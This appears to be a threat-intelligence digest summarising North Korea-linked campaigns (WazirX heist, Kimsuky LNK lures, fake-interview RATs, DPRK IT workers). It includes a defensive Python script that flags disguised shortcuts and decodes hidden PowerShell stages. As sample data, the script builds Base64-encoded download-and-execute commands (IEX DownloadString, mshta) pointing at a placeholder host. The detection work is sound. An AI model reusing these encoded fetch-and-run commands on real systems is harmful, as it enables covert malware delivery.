Blackwater International analyzed the July 2024 WazirX cyber heist, in which attackers stole more than $240 million from a multi-sig wallet used by the Indian cryptocurrency exchange. The source says the attackers exploited a discrepancy between the trans…
PolySwarm summarizes DevPopper activity in which threat actors use fake job interviews to target software developers and deliver a Python-based RAT. The infection chain begins when developers are asked to download and run GitHub-hosted code, leading an NP…
A Kimsuky-linked archive used a highway construction invoice theme and hid an LNK file behind a BMP filename, "Do-yang Company 20240610 invoice cover.bmp.lnk". The shortcut runs hidden PowerShell, decodes a Base64 command, downloads a decoy BMP from Dropb…
TRM Labs reports that Argentine Federal Police arrested a Russian national accused of laundering illicit cryptocurrency through an Argentina-based operation. The DPRK-relevant finding is that the subject allegedly accepted proceeds from illicit actors inc…
A July 2024 software supply-chain roundup notes that North Korean threat actors published multiple malicious npm packages targeting developers, with activity reportedly continuing for about a year. Some of the npm packages mimicked trusted or popular pack…
Zscaler ThreatLabZ research tracks Kimsuky activity across government, diplomatic, defense, think-tank, NGO, journalist, defector, academic, cryptocurrency, and e-commerce targets in South Korea, Japan, the United States, and other regions. The slides des…
The Coinmonks report follows a suspected Lazarus-linked GitHub network centered on accounts connected to Devmaster929 and Warmice71. It describes fake developer and recruiter profiles that act as follower nodes, boost credibility for target personas, moni…
A Korean malware analysis links the integration.pdf.lnk sample to Konni, described in the source as a North Korea-linked intrusion group associated with Thallium/APT37 and possibly Kimsuky. The LNK masquerades as a PDF view action and invokes cmd.exe with…
S2W TALON analyzed an LNK malware case that used a tax-evasion explanation-material lure and downloaded additional files from a hardcoded attacker server. The downloaded payloads included a malicious AutoIt script and a legitimate AutoIt3 runtime, ultimat…
Nurilab analyzed a VBS RAT script assessed as a BabyShark payload from Kimsuky activity against South Korean university professors in July 2024. The infection path used spearphishing to Gmail and Daum accounts, fake Naver or university portal login pages …
Cisco Talos attributes MoonPeak activity to UAT-5394, a North Korea-nexus cluster it tracks separately from Kimsuky because the overlap is not yet technically conclusive. The actor forked XenoRAT into the MoonPeak RAT and used staging, C2, payload hosting…
A malicious LNK file attributed in the excerpt to Kimsuky used a private policy-meeting lure about South Korea-China and North Korea-China security issues. The file masqueraded as a Hangul Word Processor document and launched hidden PowerShell that search…
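The three LNK lures summarized above (the ".bmp.lnk" invoice cover, the integration.pdf.lnk sample and the shortcut posing as a Hangul Word Processor document) share two traits a triage script can key on: a document or image extension placed in front of the real .lnk extension, which Explorer hides by default, and a hidden-window PowerShell launch that unwraps a Base64-encoded stage. The Python below is an added example written for this page, not code from any of the cited reports. The filenames, command lines and example.invalid URLs are constructed samples; the command-line checks are meant to run over process-creation telemetry (Sysmon Event ID 1, EDR logs) rather than over the LNK binary itself.

```python
import base64
import binascii
import re

# Constructed samples modelled on the lures in this collection (not taken from the reports):
# a document/image extension in front of the real .lnk extension, and PowerShell command
# lines of the kind such shortcuts launch. example.invalid is a reserved, non-resolving host.
SAMPLE_FILENAMES = [
    "Do-yang Company 20240610 invoice cover.bmp.lnk",
    "integration.pdf.lnk",
    "policy_meeting.hwp.lnk",
    "quarterly_report.pdf",
    "shortcut_to_notepad.lnk",
]

STAGE1_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
# -EncodedCommand takes Base64 of UTF-16LE text, so encode the stage that way.
SAMPLE_CMD_ENCODED = (
    "powershell.exe -WindowStyle Hidden -NoProfile -EncodedCommand "
    + base64.b64encode(STAGE1_PLAINTEXT.encode("utf-16le")).decode()
)
STAGE2_PLAINTEXT = b"Start-Process mshta.exe http://example.invalid/x"
# Inline FromBase64String() variant, decoded by the script itself as UTF-8.
SAMPLE_CMD_INLINE = (
    'cmd.exe /c powershell -w hidden -c "IEX([Text.Encoding]::UTF8.GetString('
    "[Convert]::FromBase64String('" + base64.b64encode(STAGE2_PLAINTEXT).decode() + "')))\""
)

# Extensions attackers put before .lnk so the visible name looks like a harmless document.
DISGUISE_EXTENSIONS = {"bmp", "jpg", "jpeg", "png", "gif", "pdf", "hwp",
                       "doc", "docx", "xls", "xlsx", "txt"}
DOUBLE_EXT_RE = re.compile(r"\.([A-Za-z0-9]{2,5})\.lnk$", re.IGNORECASE)

HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE)
ENCODED_CMD_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
INLINE_B64_RE = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.IGNORECASE)


def is_disguised_lnk(name: str) -> bool:
    """True when a .lnk carries a document-like second extension in front of .lnk."""
    m = DOUBLE_EXT_RE.search(name)
    return bool(m) and m.group(1).lower() in DISGUISE_EXTENSIONS


def scan_filenames(names):
    """Return the names that look like disguised shortcuts."""
    return [n for n in names if is_disguised_lnk(n)]


def decode_blob(blob: str):
    """Base64-decode a PowerShell stage. Chooses UTF-16LE when the bytes show the
    NUL-in-every-odd-byte pattern of ASCII text in that encoding, else UTF-8."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    utf16 = len(raw) >= 2 and raw[1::2].count(0) >= len(raw) // 4
    return raw.decode("utf-16le" if utf16 else "utf-8", errors="replace")


def analyze_command(cmd: str) -> dict:
    """Flag hidden-window PowerShell and recover any Base64-wrapped stage from a command line."""
    blobs = ENCODED_CMD_RE.findall(cmd) + INLINE_B64_RE.findall(cmd)
    decoded = [d for d in (decode_blob(b) for b in blobs) if d is not None]
    hidden = bool(HIDDEN_RE.search(cmd))
    return {
        "hidden_window": hidden,
        "encoded_payloads": len(blobs),
        "decoded": decoded,
        "suspicious": hidden or bool(blobs),
    }


if __name__ == "__main__":
    for name in scan_filenames(SAMPLE_FILENAMES):
        print("disguised shortcut:", name)
    for cmd in (SAMPLE_CMD_ENCODED, SAMPLE_CMD_INLINE):
        result = analyze_command(cmd)
        print("hidden window:", result["hidden_window"], "| decoded:", result["decoded"])
```

The filename check is deliberately narrow: a plain `something.lnk` is legitimate and is not flagged, only a second extension from the disguise list is. The decoder prints the recovered stage so an analyst sees the download URL at triage time instead of the opaque Base64 the shortcut carries.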
Nisos uses the July 2024 case of a U.S. security awareness company hiring a North Korean hacker under a stolen identity to outline DPRK remote IT worker hiring risks. The scheme relies on fake personas and stolen U.S. identities to obtain remote software …
The insiders claimed to be US residents and were hired for remote IT positions, which granted them access they exploited to attempt data exfiltration, install malware and conduct other malicious activity. In April 2024, CrowdStrike Services responded to t…
KBS reports evidence that North Korean IT workers may have participated in developing South Korean mobile applications through outsourced development channels. The article describes leaked data from a developer system, indicators suggesting a North Korean…